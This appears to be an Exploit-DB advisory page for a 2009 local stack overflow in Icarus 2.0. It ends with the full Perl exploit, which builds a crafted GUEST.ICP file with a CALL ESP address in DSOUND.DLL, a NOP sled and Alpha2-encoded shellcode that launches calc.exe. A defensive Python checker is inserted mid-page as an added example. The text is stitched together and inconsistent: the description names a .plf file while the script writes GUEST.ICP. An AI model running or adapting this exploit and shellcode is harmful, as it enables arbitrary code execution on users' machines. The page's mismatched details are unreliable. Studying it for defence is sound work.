Vendor: Icarus 2.0
By: [0]x80->[H]4x²0r
CVSS: 7.8 (HIGH)
CWE: 119 (Stack-based Buffer Overflow)
Product Name: Icarus 2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: N/A
CPE: a:icarus:icarus_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Icarus 2.0 Local Stack-based Buffer Overflow Exploit

Icarus 2.0 is vulnerable to a stack-based buffer overflow that is triggered when a maliciously crafted .plf file is loaded into the application. This can be exploited to execute arbitrary code by overwriting the saved return address with the address of the attacker's payload. The exploit code below generates a malicious .plf file containing shellcode encoded with Alpha2.
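The overflow described above is reachable only because the application copies a configuration value into a fixed-size stack buffer without a length check. The following checker is an added example (not part of the original advisory, and not Icarus code) that a defender could run over such key=value files before they reach the vulnerable parser. It flags the two properties the crafted file on this page has and a legitimate file does not: a value far longer than any plausible server name, and raw non-printable bytes in the value. The 256-byte limit, the key=value layout and the sample contents are assumptions; the real parser's buffer size is not documented here.

```python
"""Defensive checker for Icarus-style key=value files such as GUEST.ICP.

Added example: flags config values long enough to overrun a fixed-size
stack buffer, plus values carrying raw non-printable bytes. The limit and
file layout are assumptions, not facts about the real Icarus parser.
"""
import string

MAX_VALUE_LEN = 256  # assumed sane upper bound for a hostname or address value
# Bytes considered legitimate in a text config value (ASCII printable set,
# minus vertical tab and form feed which never belong in a hostname).
PRINTABLE = set(string.printable.encode("ascii")) - {0x0B, 0x0C}


def check_icp(data: bytes, max_value_len: int = MAX_VALUE_LEN) -> list[str]:
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    for lineno, raw in enumerate(data.splitlines(), start=1):
        if not raw.strip():
            continue
        key, sep, value = raw.partition(b"=")
        if not sep:
            findings.append(f"line {lineno}: no '=' separator")
            continue
        name = key.decode("ascii", "replace")
        if len(value) > max_value_len:
            findings.append(
                f"line {lineno}: {name!r} value is {len(value)} bytes "
                f"(limit {max_value_len})"
            )
        bad = [b for b in value if b not in PRINTABLE]
        if bad:
            findings.append(
                f"line {lineno}: {len(bad)} non-printable byte(s) in {name!r} "
                f"value, first is 0x{bad[0]:02x}"
            )
    return findings


def is_suspicious(data: bytes) -> bool:
    """True if the file should be quarantined rather than handed to the parser."""
    return bool(check_icp(data))


# Constructed samples, not real Icarus files.
BENIGN = b"server=icarus.example.local\r\nport=5000\r\n"
# Mirrors the layout of the exploit on this page: 528 filler bytes, a 4-byte
# address, a NOP sled, then opaque bytes standing in for the encoded payload.
CRAFTED = (
    b"server=" + b"A" * 528 + b"\x28\x55\x3d\x72" + b"\x90" * 20 + b"\xeb\x03\x59"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(label, "->", check_icp(sample) or "clean")
```

The crafted sample produces two findings (an oversized value and non-printable bytes), while the benign one produces none. Note that the length check alone is the meaningful control: an attacker can choose an all-printable payload (Alpha2 encoding exists for exactly that reason), so a scanner that only looks for odd bytes would miss a fully alphanumeric variant.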

Mitigation:

Update to the latest version of Icarus 2.0.

Exploit-DB raw data:

#!/usr/bin/perl
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
# By : [0]x80->[H]4x²0r									     #
# Contact : hashteck[at]Gmail[dot]com						             #
# From : Morocco									     #
# PoC by : ThE g0bL!N									     #
#[+]--------------------------------------------------------------------------------------[+]#
# Program : Icarus 2.0  								     #
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit 6.0 Vista Pro							     #
#[+]--------------------------------------------------------------------------------------[+]#
##############################################################################################
#####################################  Proud to be HACKER  ###################################
##############################################################################################
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
#											     #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
# Put the file generated by this exploit in Icarus Directory ( After you made a back up of   #
# the original file ) then launch Icarus.exe and b000m , calc.exe is launched                #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
#											     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
# Note : The shellcode is encoded with Alpha2 . The program doesn't accept non-encoded	     #
# Shellcode . I'm too lazy to figure that out now , if you find something contact me !	     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#


$Header="server=" ;
$junk="\x41" x 528;
$EIP = "\x28\x55\x3D\x72"; # 0x723D5528 -- DSOUND.DLL -- CALL ESP
$NOPS = "\x90" x 20 ;
# win32_exec -  EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a".
"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b".
"\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e".
"\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32".
"\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45".
"\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b".
"\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79".
"\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b".
"\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74".
"\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77".
"\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b".
"\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f".
"\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47".
"\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f".
"\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43".
"\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59".
"\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32".
"\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73".
"\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";
#
#
#
open(myfile,'>>GUEST.ICP');  # append the payload to GUEST.ICP in the current directory
binmode(myfile);             # write raw bytes; avoids newline translation on Windows
print myfile $Header.$junk.$EIP.$NOPS.$shellcode;
close(myfile);

#----------------------------------------------------------------------------------#
# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
#----------------------------------------------------------------------------------#

# milw0rm.com [2009-07-14]